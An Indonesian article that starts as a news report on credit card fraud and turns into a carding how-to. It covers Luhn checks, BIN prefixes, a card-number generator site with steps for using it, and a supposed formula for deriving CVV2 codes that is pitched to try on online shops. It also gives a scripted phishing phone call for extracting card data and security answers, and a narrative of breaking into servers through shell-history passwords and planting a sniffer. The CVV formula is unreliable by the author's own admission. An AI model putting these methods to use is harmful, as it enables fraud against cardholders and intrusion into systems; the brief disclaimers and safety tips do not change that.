Surabaya - Fraud atau pemalsuan masih menjadi momok menakutkan bagi - issuer (penerbit kartu kredit). Meski berbagai kasus berhasil dibongkar dan penegakan hukum dilakukan, fraud masih saja terjadi.
Menurut Koordinator Asosiasi Kartu Kredit Indonesia (AKKI) Jatim Dwi Yulianto, dalam refleksi kinerja 2006, kasus card fraud (pemalsuan kartu) maupun application fraud (pemalsuan aplikasi) dialami hampir semua issuer. "Tahun lalu, ada lima kasus besar di Jatim dengan nilai pemalsuan hingga miliaran rupiah," ujarnya.
Dia mengatakan, meski beberapa pelaku telah diadili dan dijatuhi hukuman penjara, hal itu tidak membuat pelaku lainnya jera. Buktinya, lanjut dia, hingga semester I tahun ini sudah ada empat kasus di Surabaya yang ditangani pihak kepolisian, bahkan salah satunya sudah divonis.
"Semuanya kasus application fraud," terang card center manager Bank Permata Surabaya tersebut.
Karena itu, menurut Dwi, manajemen resiko fraud selalu menjadi pembahasan dalam setiap forum AKKI. Sebab, lanjut dia, penyaluran dana lewat kartu kredit termasuk kategori unsecure loan karena tidak menyertakan jaminan sehingga beresiko tinggi. "Sehingga, cara paling efektif bagi issuer untuk menekan resiko fraud adalah memilih nasabah secara lebih selektif," katanya.
Hingga April 2007, total outstanding kartu kredit secara nasional mencapai Rp 18,7 triliun. Jumlah kartu kredit yang beredar pun sudah menembus 8,2 juta dengan jumlah pemegang kartu sekitar 4 juta orang. Sekitar 15-20 persennya berada di Jatim. "Tahun ini, pertumbuhan belanja kartu kredit diprediksi mencapai 20 persen," terangnya.
Berikut ini beberapa hal lain yang Anda juga perlu tahu lebih banyak mengenai seluk beluk kartu kredit, aspek keamanannya, dan modus operandi atau prosedur yang biasa dilakukan para carder dalam melaksanakan aksinya. Simak saja baik-baik dan mohon supaya informasi ini tidak disalahgunakan. Bagi para pemilik toko online, para penegak hukum, dan para webmaster, hendaknya tulisan ini bermanfaat untuk sekedar menambah wawasan dan juga meningkatkan kewaspadaan Anda semua.
SEKELUMIT TENTANG KARTU KREDIT
Bermula dari tahun 1920-an di Amerika mulai digunakan sebuah kartu untuk melayani pembelian bensin. Konsep pemakaian kartu sebagai salah satu sarana bertransaksi telah dikenal sejak lama. Pada era tahun 1970-an mulailah lahir mesin-mesin ATM sebagai penanda lahirnya pemakaian teknologi informasi dalam hal transaksi perbankan. Sejak itu pula teknologi sebagai asal muasal kartu kredit mulai lahir. Berikut perkembangannya:
- Tahun 1924. Konsep pemakaian kartu untuk transaksi perbankan mulai diterapkan oleh 100 buah bank di seluruh dunia.
- Tahun 1938. Beberapa perusahaan mulai bisa menggunakan antar kartu.
- Tahun 1950. Konsep penggunaan kartu sebagai alat pembayaran ditemukan oleh Frank X. Mc Namara. Pada tahun yang sama lahirlah kartu plastik pertama, yaitu Dinners Club yang selanjutnya diikuti oleh American Express.
- Tahun 1958. Bank of America mengeluarkan BankAmericard. AMEX mulai merambah pasar entertainment dan travel dalam hal penggunaan kartu.
- Tahun 1966. Bank of America menawarkan lisensi kartu America Bank untuk membuat kartu pembayaran kepada bank-bank lainnya. Pada tahun yang sama pula lahirlah Master Card.
- Tahun 1969. ATM pertama lahir di Inggris.
- Tahun 1970. Konsep mengenai kartu kredit diterima secara luas.
- Tahun 1977. Lahirlah VISA.
- Tahun 1995. Transaksi perbankan Amerika menggunakan sarana elektronik mencapai lebih dari 90%.
Siapa sih, yang tidak kenal dengan kartu kredit. Kata orang, itu punyanya orang-orang kaya, kalau belanja bisa ngutang, jadi bayarnya belakangan. Tapi sekarang kartu kredit bukan hanya monopoli orang-orang kaya saja, dulu sih memang. Anak-anak muda sekarang sudah banyak yang mengantongi kartu kredit di dompetnya.
Informasi yang diincar oleh para carder (pemalsu maupun pencuri data kartu kredit) adalah 16 digit nomor yang tertera pada bagian depan kartu kredit tersebut. Dari logonya biasanya akan dapat diketahui jenis kartu kredit misalnya saja visa dan master card yang memiliki lambang logo yang tertera pada bagian depan kartu. Ada juga beberapa jenis kartu kredit sekarang ini menggunakan chip dan juga logo di belakang kartu tersebut.
Informasi penting lainnya adalah Expiration date, yaitu tanggal berakhirnya sebuah kartu kredit. Terdapat beberapa informasi tambahan lainnya, seperti nama pemilik kartu, bank penerbit kartu, serta bulan dan tahun terbit. Seiring dengan meningkatnya sistem keamanan online maka kartu kredit juga dibekali kode atau angka rahasia, yang biasanya dimasukkan saat transaksi. Secara fisik, angka itu terdapat pada bagian belakang kartu kredit.
MENGENAL KODE RAHASIA.
Tiga digit angka yang terdapat di belakang kartu kredit adalah nomor otorisasi manual untuk kartu kredit supaya bisa melakukan transaksi. Tiga digit angka tersebut dikenal dengan istilah CVV (Cardholder Verification Value), ada juga yang menyebutnya CSC (Card Security Code), pada beberapa kasus ada pula yang menyebut CVV dengan CVN (Card Verification Number). Istilah CVV lebih sering digunakan ketimbang CSC maupun CVN.
CVV ini, terutama sering digunakan untuk transaksi yang tidak menggunakan kartu kredit secara fisik, seperti berbelanja lewat internet. Dengan adanya CVV ini berguna untuk mencegah orang yang tidak berhak dalam melakukan transaksi yang menggunakan kartu kredit.
Istilah untuk kode rahasia tersebut akan berbeda-beda untuk setiap jenis kartu. Untuk jenis kartu Visa dan Diners Club menyebutnya CVV2, MasterCard menyebutnya CVC2. Khusus untuk Amex atau American Express menyebutnya CID (Card Identification Number). Pada Amex, CVV-nya adalah 4 digit, yang terdapat pada bagian depan kartu kredit.
Sedangkan untuk proses transaksi langsung pada toko-toko konvensional, kode tersebut bisa dilihat langsung oleh kasir. Kadang-kadang mereka juga melihat tanda tangan. Sebab kartu kredit tidak akan berlaku jika tidak ditandatangani pada bagian belakangnya. Karena tanda tangan itu adalah sebagai otorisasinya. Jadi, boleh dibilang CVV berguna sebagai pengganti tanda tangan.
ALGORITMA CEK DIGIT LUHN.
Saya tidak akan berpanjang lebar pada bagian ini. Saya memasukkan hal ini hanya sebagai tambahan yang perlu diketahui. Setiap kali melakukan transaksi menggunakan kartu kredit ada suatu proses yang disebut sebagai authentication yaitu sebuah proses untuk memastikan bahwa nomor kartu kredit yang dimasukkan adalah benar.
Proses transaksi dimulai dimana pihak merchant menggesekkan kartu kredit dan dihubungkan ke server bank untuk diperiksa. Untuk menghindari adanya kesalahan maka kartu kredit dirancang sehingga memungkinkan dilakukannya pengecekan awal, sebelum sebuah kartu diperiksa. Pengecekan ini adalah pengecekan digit atau disebut juga algoritma cek digit.
Algoritma cek digit pada kartu kredit disebut sebagai cek digit Luhn.
Algoritma cek digit ini sudah banyak digunakan oleh bank-bank besar yang mengeluarkan kartu kredit. Pada dasarnya, metode yang digunakan cukup sederhana. Misalnya, kartu kredit yang terdapat 16 digit angka. Proses pengecekannya adalah:
1. Digit yang berada di posisi ganjil (dihitung mulai dari digit paling kiri) yang berarti digit pertama. Nilainya dikalikan dengan dua; jika hasilnya lebih besar dari 9 maka kurangi hasilnya dengan 9, kemudian jumlahkan semua angka yang diperoleh.
2. Jumlahkan semua digit yang berada di posisi genap.
3. Jumlahkan hasil prosedur nomor 1 dengan nomor 2 di atas. Apabila hasilnya habis dibagi 10, berarti nomor kartu tersebut sah.
Sedangkan apabila kartu kreditnya terdapat digit ganjil (misalnya 13 atau 15), caranya sama saja. Perbedaannya hanya pada langkah nomor 1 yang dikalikan adalah digit pada posisi genap, dan pada langkah nomor 2 yang dijumlahkan adalah digit posisi ganjil.
Sebagai contoh:
Kartu kredit dengan nomor 9876-5432-1012-3456. Saya ingin mengetahui apakah nomor kartu kredit tersebut sah atau tidak.
Diketahui: ada 16 digit (genap).
1. Kalikan semua angka pada digit ganjil dengan dua lalu kurangi hasilnya dengan 9 (jika hasilnya lebih dari 9), kemudian jumlahkan.
Digit ke-1: 9 9x2 = 18 (lebih dari 9) 18-9 = 9
Digit ke-3: 7 7x2 = 14 (lebih dari 9) 14-9 = 5
Digit ke-5: 5 5x2 = 10 (lebih dari 9) 10-9 = 1
Digit ke-7: 3 3x2 = 6 ; 6 (tetap; kurang dari 9)
Digit ke-9: 1 1x2 = 2 ; 2 (tetap; kurang dari 9)
Digit ke-11: 1 1x2 = 2 ; 2 (tetap; kurang dari 9)
Digit ke-13: 3 3x2 = 6 ; 6 (tetap; kurang dari 9)
Digit ke-15: 5 5x2 = 10 (lebih dari 9) 10-9 = 1
Jumlahkan: 9 5 1 6 2 2 6 1 = 32
2. Jumlahkan digit yang ada di posisi genap.
Digit ke-2: 8
Digit ke-4: 6
Digit ke-6: 4
Digit ke-8: 2
Digit ke-10: 0
Digit ke-12: 2
Digit ke-14: 4
Digit ke-16: 6
Jumlah : 32
3. Tambahkan dengan hasil nomor 1 ditambah nomor 2.
32 32 = 64
Karena 64 tidak habis dibagi 10 maka nomor tersebut tidak sah sebagai nomor kartu kredit.
Nah, dari teknik seperti inilah banyak diterapkan untuk membuat program pembuat dan pengecek kartu kredit. Tapi, banyak hasil nomor kartu kredit dari program tersebut tidak bisa digunakan begitu saja. Karena pemeriksaan yang jauh lebih ketat. Misalnya, perlunya nama pemilik dan tanggal berakhir (expiration date).
Secara umum, jika dikelompokkan maka diketahui prefix kartu kredita adalah:
4xxx VISA
5xxx MASTERCARD
6xxx DISCOVER
37xx AMERICAN EXPRESS
Prefix adalah digit awal pada kartu kredit. Sebagai bekal bagi Anda, berikut saya tampilkan tabel prefix beberapa kartu kredit. Sebelumnya saya jelaskan dulu. Sebelum saya suguhkan tabel, sebaiknya Anda baca sedikit informasi tambahan, untuk memperjelas tabelnya.
- Sejak 8 November 2004, Mastercard membeli BIN Range milik Diner's Club untuk kawasan Amerika. BIN Range Diner's Club Internasional dimulai dengan 38, sedangkan BIN Range 36 menjadi milik MasterCard.
- Sejak 1 Oktober 2005, Discover Bank menyertakan BIN yang baru yaitu 650000-650999
Tabel Prefix Beberapa Kartu Kredit.
PREFIX PANJANG NOMOR JENIS KARTU
1800 15 JCB
2131 15 JCB
300 14 Diner's Club
301 14 Diner's Club
302 14 Diner's Club
303 14 Diner's Club
304 14 Diner's Club
305 14 Diner's Club
34 15 American Express
36 14/16 MasterCard
37 15 American Express
38 14 Diner's Club
3 16 JCB
4 13/16 Visa
51 14/16 MasterCard
52 14/16 MasterCard
53 14/16 MasterCard
54 14/16 MasterCard
55 14/16 MasterCard
56 14/16 Bank Card
6011 16 Discover Card
6500-6509** 16 Discover Card
6013 16 Discover Card
560 16 Bank Card
561 16 Bank Card
BIN (Bank Identification Number) merupakan 6 digit awal nomor kartu kredit. Boleh dibilang untuk menunjukkan institusi yang mengeluarkan kartu tersebut pada konsumen atau card holder.
Dari apa yang telah saya jelaskan mengenai prefix dan algoritma Luhn, saya akan memaparkan sedikit mengenai algoritma spesifik pada kartu American Express.
- 4 digit pertama, menunjukkan: kode negara, kode mata uang, dan jenis kartu (Charge atau Credit Card).
- 2 digit berikutnya, menunjukkan: tipe kartu apakah Gold atau Platinum.
- 1 digit berikutnya merupakan Billing Cycle.
- 4 digit berikutnya lagi merupakan nomor account.
- 4 digit berikutnya (setelah sebelum-sebelumnya) menunjukkan nomor terbitan kartu (card issue) yang mulai dari angka 1, dan akan terus naik, apabila terjadi pergantian kartu baik karena hilang atau dicuri.
- 2 digit berikutnya lagi, card issue, di bawah account. Contohnya, jika ada pemegang kartu tambahan, diawali dengan 00 dan akan terus naik.
- Digit terakhir merupakan cek digit Luhn (digunakan untuk verifikasi).
CREDIT CARD GENERATOR
Berhubung saya sempat menyinggung persoalan generator nomor kartu kredit, maka saya akan menjelaskan beberapa hal. Program generator nomor kartu kredit tersebut lebih dikenal dengan sebutan CC thred. Supaya lebih enak, saya lebih menyukai menyebutnya CC Generator. Terkadang dalam kegiatan carding, para pelakunya tidak hanya melakukan pencarian melalui internet, bisa saja dengan memanfaatkan CC Generator untuk mendapatkan nomor yang baru.
Ada banyak program CC Generator yang beredar. Hal ini bisa terjadi karena konsep kerja CC Generator tersebut adalah menghasilkan nomor-nomor fiktif. Dimana nomor yang dihasilkan bukanlah sederetan nomor sembarangan. Melainkan, hasil perhitungan berdasarkan algoritma.
Terkadang nomor yang dihasilkan oleh CC Generator tersebut gagal digunakan saat transaksi. Hal ini bisa terjadi, sebab saat ini kebanyakan merchant baik juga toko online, tidak hanya melakukan pengecekan berdasarkan algoritma nomor kartu kredit saja. Ada banyak hal lainnya, seperti tanggal berakhir, nama pemilik, nomor CVV dan sebagainya.
Selain itu kemungkinan pula CC Generator tersebut akan menghasilkan nomor yang sudah tidak aktif lagi. Katakanlah sudah pernah keluar dulunya dan sekarang nomor tersebut sudah mati.
Sebenarnya, saya tidak begitu suka membahas tentang CC Generator ini. Lagi pula saya lebih suka aktivitas tanpa tools. Jadi, Anda pun bisa mencoba menggunakan generator kartu kredit hanya bermodalkan sebuah browser.
Caranya adalah dengan masuk ke situs berikut:
http://www.elfqrin.com/hacklab/pages/discard.php
Pada tampilan paling atas pada situs tersebut, Anda bisa melakukan validitas mengenai sebuah nomor kartu kredit.
Untuk men-generate sebuah nomor kartu kredit, pertama-tama, tentukan jenis kartu kredit yang akan digenerate tersebut. Kemudian masukkanlah nomor kartu kredit yang valid. Validitas sebuah kartu kredit bisa Anda coba seperti di atas.
Misalnya, nomor yang valid tersebut adalah:
1234567890124567
Gantilah salah satu angka menjadi huruf x.
Misalnya, 1234 5678 9012 45xx, atau 1234 xxxx xxxx xxxx. Banyaknya huruf x terserah kepada Anda. Hal ini bertujuan supaya program tersebut mengubah huruf x tersebut menjadi angka yang sesuai. Begitu gampang bukan.
MENGAKALI CVV.
Pada bagian sebelumnya, Anda sudah bermain-main dengan angka-angka atau nomor kartu kredit itu sendiri. Sekarang saatnya mempermainkan angka-angka atau nomor CVV. Berikut ini akan saya jelaskan mengenai bagaimana cara yang digunakan oleh para carder untuk mengetahui CVV dari sebuah nomor kartu kredit. Hal ini sangat penting sekali, sebab peranan CVV sangatlah besar berhubungan dengan kartu kredit. Sebelum itu, saya ingin menunjukkan sebuah tools yang bernama Crack CVV2. Tools ini dibuat oleh J4mbi H4ck3r.
Misalnya saja nomor yang diisikan pada software tool crack CVV2 adalah 5444605876165920. Nomor tersebut hanyalah contoh. Dengan menekan tombol Generated maka akan muncul nilai CVV2 yang dicari. Nilai CVV2nya adalah 865.
Sudah saya katakan, kebanyakan dari tools sejenis memberikan nomor CVV yang tidak akurat. Setelah saya bandingkan hasil generate dari tool crack CVV2 tersebut dengan CVV yang asli dari kartu kredit yang saya contohkan tadi, ternyata nomor CVVnya berbeda. Walau demikian, nomor-nomor tersebut yang "tidak tepat", tetapi ternyata masih bisa diterima sebagai validasi. Hal ini saya coba dengan melakukan validitas sebuah kartu kredit yang caranya telah saya jelaskan di bagian awal tadi.
Untuk menunjukkan ketidakvalidan, nomor CVV tersebut, sekarang saya mencoba untuk mengganti dua digit terakhir dari nomor di atas menjadi 5444605876165925. Nomor CVV2 yang dihasilkan tetaplah sama 865. Berhubung walau salah seperti itu, tetapi masih tetap dapat diterima oleh situs di internet. Saya akan menunjukkan cara kerjanya.
Alasan saya mengapa saya memilih tools tersebut sebagai contoh. Hal ini karena metode atau cara kerja yang akan saya jelaskan adalah sama. Hanya saja di sini saya menggunakannya berdasarkan rumus, bukan sebuah program.
Cara kerja yang pertama, bagaimana cara mengetahui bahwa jenis kartu tersebut adalah MasterCard (MasterC pada gambar).
"Ya, iyalah. Bisa ditebak."
Kan sebelumnya, Anda sudah mengetahui mengenai prefix. Nomor yang diawali dengan angka 5 adalah MasterCard. Dan nomor yang diawali dengan angka 4 adalah Visa. Gampang bukan.
Sekarang cara untuk mengetahui nomor CVV2. Rumusnya adalah:
Digit ke-8 Digit ke-12 (Digit ke-3 1)
Dari nomor 5444605876165920
Digit ke-8 adalah 8
Digit ke-12 adalah 6
Digit ke-3 adalah 4 1 = 5
Maka CVV2-nya adalah 865
Dari rumus tersebut terjawab sudah; mengapa pada saat dua digit terakhir diganti nomor CVV2 tidak berubah. Hal ini karena dalam rumus hanya menghitung digit ke-8, ke-12, dan digit ke-13. Sedangkan digit ke-15 dan digit ke-16 tidak tersentuh.
Dibandingkan dengan tools di atas yang hanya menggunakan satu rumus saja. Sebagai tambahan, apabila menggunakan rumus di atas, CVV-nya ditolak. Anda masih dapat mencoba menggunakan rumus berikut: Digit ke-7 Digit ke-13 (Digit ke-3 1)
Cara perhitungannya tetaplah sama. Siapa tahu berhasil.
Ingat, metode tersebut hanyalah sebuah metode. Jujur saja, saya sendiri tidak tahu rumus maupun algoritma yang benar-benar digunakan oleh lembaga finansial. Namun, setidaknya metode di atas adalah salah satu metode yang digunakan oleh para carder.
Buktinya, walaupun tidak sesuai dengan nomor CVV yang asli (saya coba menggunakan kartu kredit yang asli). Saat melakukan validitas di internet tetap dapat diterima. Walaupun rumus tersebut tidak tepat 100% masih banyak saja toko online di internet yang mau menerima. Jadi, walaupun "salah-salah" begitu, masih bisa digunakan.
Sekali lagi ingat, kedua rumus tersebut tidak menjami kevalidan CVV sebuah kartu kredit. Walau demikian, masih tetap layak untuk dicoba. Iseng-iseng berhadiah.
KONVENSIONAL CARDING.
Saya akan memulai dengan teknik paling gampang yang dilakukan seorang carder. Konvensional carding...Apalagi ini?
Konvensional carding adalah teknik melakukan carding tanpa menggunakan komputer apalagi koneksi internet dan tools. Hanya bermodalkan mengais tong sampah, seseorang bisa menjadi carder yang berbahaya. Seseorang bisa menjadi carder tanpa harus memahami dunia internet sedikit pun. Ah,masa sih? Enak banget, tidak perlu modal...
Iya bener. Terkadang banyak kertas-kertas yang berserakan bisa menjadi lahan bagi para carder. Supaya lebih jelas, Anda ikuti saja penjelasannya.
Hampir sama dengan Social Engineering, konvensional carding adalah dengan memanfaatkan kelalaian manusia. Serta kejorokan seorang carder yang suka mengais-ngais tong sampah.
Iya sebenarnya, hanyalah trik saya untuk menakut-nakuti saja, supaya tidak banyak yang menjalankan konvensional carding, karena hal ini sangat mudah dilakukan oleh siapapun.
Anda bisa saja mendapatkan informasi kartu kredit tidak hanya dari tong sampah. Bahkan struk belanja dari supermarket pun yang biasa dibuang sembarangan bisa juga bermanfaat untuk melancarkan teknik konvensional carding ini.
Dari struk belanja di supermarket (yang menggunakan pembayaran kartu kredit), Anda bisa mengetahui 3 hal berikut:
1. Jenis kartu (misalnya: VISA)
2. Nama pemilik kartu kredit tersebut.
3. Reference menunjukkan nomor kartu kredit.
Apakah Anda mengira informasi itu hanya bersumber dari struk belanja saja? Anda salah. Pada saat seseorang berbelanja menggunakan kartu kredit maka pemilik kartu tersebut akan menerima sebuah struk bank (yang pertama dari toko), bukti pembelanjaan menggunakan kartu kredit. Lihat, ada beberapa bukti pembelanjaan yang menggunakan kartu kredit. Di sana akan selalu tertera jenis kartu apakah Visa, Amex (American Express), dan sebagainya. Juga terdapat tanggal transaksi, nama pemilik kartu, beserta nomor kartu kreditnya. Pada beberapa kasus ada yang ditandatangani.
Wahai para pemilik kartu kredit, sadarkah Anda dengan kebiasaan Anda yang membuang sembarangan bukti pembelanjaan dengan kartu kredit suatu saat bisa merugikan Anda sendiri, maka waspadalah!
Berhubungan dengan bukti pembelanjaan, bagi para carder yang suka mengais tong sampah, harap sedikit teliti. Sebab ada juga struk belanja yang merupakan kartu debit (misalnya struk pembelanjaan dengan kartu debit BCA), dan bukannya kartu kredit. Hal ini bisa diketahui dengan melihat jenis kartunya. Supaya lebih jelas, ciri struk belanja yang menggunakan kartu debit, selalu mencantumkan tulisan DEBIT diiringi dengan nomor tipe kartu dalam tulisan yang besar-besar pada bukti struk belanja, sementara pada struk belanja yang menggunakan kartu kredit selalu tertulis di pojok kiri atas tulisan VISA (atau jenis kartu kredit lainnya seperti, AMEX, dsb) yang diikuti dengan nomor tipe kartu.
Apakah untuk melakukan konvensional carding, hanya bersumber dari struk belanja saja, pada dasarnya masih banyak sumber lainnya yang sering diabaikan oleh kebanyakan orang. Misalnya, di sini apabila seseorang yang baru saja menerima aplikasi kartu kredit, pada surat pengantarnya akan selalu ditampilkan nomor kartu kreditnya.
Ternyata, sejauh ini konvensional carding lebih mudah dan tidak perlu bermodal apa-apa. Apalagi tidak harus mempelajari bahasa pemrograman, atau memahami sistem keamanan komputer atau internet. Mudah bukan?
Biasanya, setiap bulan, para pemilik kartu kredit akan menerima billing tagihan. Di sana juga selalu ditampilkan data kartu kredit tersebut. Biasanya, setelah menerima billing tagihan, maka pemilik kartu kredit akan melakukan pembayaran. Salah satu sarana pembayaran adalah melalui ATM. Kesalahan yang sering dilakukan oleh orang-orang adalah membuang billing tagihan dan juga struk pembayaran setelah melakukan pembayaran tersebut. Sungguh suatu tindakan ceroboh yang membahayakan diri Anda sendiri.
SEKEDAR TIPS.
Wahai pengguna kartu kredit, janganlah Anda membuang sembarangan kertas apapun yang tertera pada nomor kartu kredit Anda, seperti struk belanja dan sebagainya. Sebisa mungkin, potonglah sekecil mungkin sebelum Anda membuangnya. Anda bisa menggunakan tangan, gunting dan sebagainya. Khusus untuk korporasi, saya menyarankan untuk menggunakan Paper Shredder. Alat tersebut berguna untuk memotong kertas-kertas yang Anda miliki, baru dibuang. Atau lebih baik lagi, bila kertas-kertas tersebut dibakar hingga menjadi abu, sehingga Anda tidak perlu khawatir lagi.
SOCIAL ENGINEERING.
Tentunya Anda sudah tahu dan sering mendengar kata-kata Social Engineering. Berikut ini langsung saya berikan sebuah contoh berupa percakapan seorang operator telepon card center ataupun customer service bank. Teknik ini pulalah yang sering ditiru oleh para carder. Selain dari bank banyak pula yang mengaku dari petugas bank bagian/departemen lainnya, konsultan keuangan, pihak penjamin kartu kredit, bagian asuransi kartu kredit, atau yang sejenis dengan itu. Biar gampang, terlebih dahulu saya buatkan sebuah ilustrasi sederhana. Katakanlah sang korban bernama Victim. Dia menerima sebuah telepon dari seseorang yang bersuara ramah, dan mengaku sebagai customer service tempat bank kartu kredit milik si Victim. Biasanya sih, mereka bersuara wanita dengan nada yang halus dan ramah serta beralasan untuk melakukan survei. Selanjutnya saya menyebut Customer Service itu sebagai Fiktif CS. Terjadilah percakapan diantara mereka.
Fiktif CS: "Halo, selamat siang. Bisa bicara dengan Bapak Victim?"
Victim: "Iya, saya sendiri. Ada yang bisa saya bantu?"
Fiktif CS: "Bapak Victim, kami dari Card Center, Bank Antah Berantah, ingin melakukan survei mengenai kartu kredit Bapak. Sebab kami akan melakukan kenaikan limit untuk kartu kredit yang Bapak miliki saat ini."
Time Out: "Bentuk modus operandi lainnya bisa beragam seperti: Perubahan sistem pada bank, menawarkan bonus/hadiah, mendata ulang customer, memastikan transaksi yang dilakukan sebelumnya, mengupgrade kartu menjadi Gold/Platinum, atau modus lainnya yang dibuat oleh para carder. Selain itu metode seperti ini sering dilakukan dengan metode tembak langsung seperti contoh di atas."
Victim: "O, iya silahkan."
Fiktif CS: "Tagihan Bapak Victim dialamatkan kemana?"
Victim: "Jl. Kesasar, Gang Buntu No. 001, Jakarta."
Fiktif CS: "Alamat tinggal Bapak Victim saat ini dimana?"
Victim: "Jl. Sumber Rejeki 111, Depok."
Fiktif CS: "Tanggal lahir Bapak?"
Victim: "10 November 1970."
Fiktif CS: "Maaf Pak, nama ibu kandungnya?"
Victim: "Mak Nyak."
Fiktif CS: "Tolong sebutkan 16 digit nomor kartu kredit Bapak?"
Victim: "Tunggu sebentar ya, saya ambil dulu dari dompet."
Fiktif CS: "Silahkan."
Victim: "Halo, ini nomornya 1234 5678 9000 0009."
Fiktif CS: ""Tolong sebutkan 3 angka terakhir yang terdapat di belakang kartu."
Victim: "Kalo yang dibelakang, nomornya 321."
Fiktif CS: "Kartu kredit Bapak berlaku sampai kapan?"
Victim: "Desember 2010."
Fiktif CS: "Baik, Pak Victim. Data Anda sudah cukup. Kartu kredit Bapak akan segera kami proses. Terima kasih atas waktunya."
Victim: "Iya, sama-sama."
Sepertinya, percakapan di atas terlihat biasa-biasa saja. Dan tidak ada yang mencurigakan. Tapi itulah teknik Social Engineering untuk melakukan Fraud atau penyalahgunaan kartu kredit. Akibatnya, data-data kartu kredit Pak Victim telah dimiliki oleh orang lain.
Saat billing tagihan datang pada bulan berikutnya, terjadi transaksi yang besar. Padahal Pak Victim tidak pernah melakukan transaksi tersebut. Dari percakapan telepon, limit Pak Victim juga tidak naik. Barulah Pak Victim sadar akan kelalaiannya.
Dari penjelasan di atas, ternyata melakukan aktivitas carding bisa dilakukan tanpa tools. Cukup bermodalkan nekad, dengan teknik Social Engineering.
Intinya, social engineering adalah untuk mendapatkan informasi dengan cara melakukan penipuan dengan memanfaatkan kelemahan manusia. Apalagi orang-orang yang gampang percaya pada orang lain.
Kegiatan carding dengan memanfaatkan social engineering juga sering terjadi pada saat kegiatan chatting. Misalnya, seseorang yang sudah merasa akrab karena sudah sering berhubungan baik melalui chatting dan email, namun belum pernah bertemu secara fisik. Kemudian salah satu pihak, mulai membuka jurusnya dengan berpura-pura minta dibelikan sesuatu pada situs tertentu. Berhubung mereka sudah terlanjur "akrab" dan ingin mencoba membantu, lalu membelikan barang melalui situs tertentu yang bisa saja situs palsu untuk mencuri data.
Satu lagi...
Pengertian dan konsep dasar Social Engineering.
Social engineering adalah sebuah perform psikologis untuk mempengaruhi dan mencoba mengidentifikasi sebuah masalah atau dalam hal ini lawan. Ini adalah seni didalam dunia elektron. Bagaimana hal ini bisa diterapkan didalam hacking?
Mengendus dengan mencari informasi dan data data yang berhubungan dengan target kita. Kamu harus berpikir dan menggunakan insting pikiran kamu untuk mendapatkan kode pemecahan dari sebuah masalah. Mungkin pembaca bingung dalam mengartikan masalah ini. Tapi dihadapkan dengan realitas keadaan hal ini akan menjadi sebuah kemungkinan.
Didalam server kita hanya bisa berkata "bagaimana ini bisa terjadi, dan langkah apa yang sebaiknya aku lakukan didalam server ilegal ini?"
Pertanyaan untuk memulai social engineering. Pertama kita mencoba berselancar didalam server ilegal tentunya. Membaca email dan mencoba mencari history history yang mendukung ke arah social engineering. Contoh ambil mysql history.
Biasanya kebiasaan buruk dari orang orang barat adalah "password yang sama untuk setiap email dan link server" Kenapa saya bisa menyimpulkan demikian?
walaupun tidak semua sysadmin bertindak seperti ini, namun hal ini bisa terjadi. Contoh yang terjadi adalah ketika saya membuka dan membaca mysql history semua password sama persis. Kemudian apa yang kita lakukan? OK tidak ada salahnya kita mencoba mem-finger root dan user satu persatu ternyata root pernah login, dan login dengan menggunakan password yang sama dengan mysql history. Satu langkah kita menuju keberhasilan sebuah psikologis hacking.
Kemudian tidak ada salahnya kita mencoba melihat dari mana dan dimana dia membeli koneksi/hosting? coba melihat di www.domainwhitepages.com, semua terlihat jelas disana, email administration samapi pop3 email terlihat jelas. Kita bisa coba masuk email dengan menggunakan password yang sama dengan mysql history. Duh ternyata kali ini salah. So what? apa yang akan kita lakukan? terus menebak? Yes thats rights. Kita coba berselancar didalam server baru yang menjadi batu loncatan kedua. Kita lihat file dan document didalam server. mulai dari bash_history mysql_history dan semua kita lihat satu persatu. Ingat social engineering adalah sebuah kebetulan dan sebuah magic.
Butuh waktu bejam jam bahkan berhari hari untuk memecahkan sebuah masalah.
Kasus ini berhenti didalam kebuntuan. Semua password yang ada tidak ada yang accept untuk login ke sebuah email, coba query ke Dns IP server. OK ketemu dan ternyata menunjukkan link ke sebuah site. Kita mencoba mencoba menelusuri layaknya sebuah detective cyber :)
Apa yang kita dapatkan disana? Sebuah link baru menuju email sang admin yang berbeda dengan alamat email sebelumnya. Ok sampai saat ini kita kembali menuju teori lama. Last but no last. Kita mencoba login menggunakan password yang ada didalam log log server pertama dan kedua. Lama kita menunggu ternyata apa yang terjadi? Tidak ada kecocokan sama sekali! Jadi apa yang hendak kita lakukan?
Gunakan insting kamu. Baca semua home page pribadi. Lihat semua informasi yang berkaitan dengan sang admin. Jangan sia siakan kesempatan ketika kamu berada didalam sever, selalu catat dan perhatikan perubahan yang ada.
Ternyata ada seorang yang sering login kedalam server, tapi tidak mempunyai otoritas sys-admin. Siapa dia? Seorang wanita bernama beth. Siapa beth? ok
kita telusuri kembali jejak beth menggunakan finger dan lastlog didalam sebuah server (newbies seriss) Lihat aktivitas apa saja yang dia lakukan.
OK ternyata beth mempunyai kebiasaan untuk lompat lompat (pindah server antar server). Hal ini menguntungkan kita untuk memasang sniffer :)
Login beth aku dapatkan dari server www.rrrroar.com menuju ke www.tera-byte.com. Misalnya saja Si A mencoba masuk dari server dimana beth pertama kali login. Beth ternyata hanya sebuah user biasa yang tidak punya previllege sebagai root Aktivitas berhenti sampai disini.
Satu minggu kemudian dia (Si A) mulai bosan dengan angan angan untuk mencoba teori ini. Namun apa yang terjadi? secara kebetulan beth login ke www.tera-byte.com menggunakan akses root, jangan menunggu panjang segera buka log di sniffer yang sudah terpasang. Apa yang akan kita lakukan untuk langkah final?! Jangan tunggu kedatangan seorang dewa penolong! Segera siapkan sniffer anda, pasang dan ingat! jangan pernah merubah file/sebuah proses yang ada didalam box anda.
Sekian sebuah pengantar psikologis. Mungkin sedikit dongeng diatas bisa anda jadikan sebagai pola pikir praktis didalam langkah menuju social engineering (expert edition). Kalau sudah berhasil, ingat Anda hanya boleh melihat-lihat (DILIHAT BOLEH DIPEGANG JANGAN!) dan jangan sampai tergoda untuk menyalahgunakan, OK? Ini hanyalah latihan untuk menambah ilmu mengenai network security, jadi hanya untuk pembelajaran demi keilmuwan, tidak untuk disalahgunakan!!
SECURITY TIPS.
Untuk menghindari tindakan seperti ini, pastikan bahwa yang menelepon Anda saat itu adalah benar-benar dari pihak bank. Biar lebih yakin, hubungilah pihak Call Center dari bank tersebut. Selanjutnya jangan mudah memberikan nomor kartu kredit maupun nomor telepon Anda kepada pihak lain SIAPAPUN yang tidak jelas. Apalagi disertai dengan 3 angka terakhir di belakang kartu.
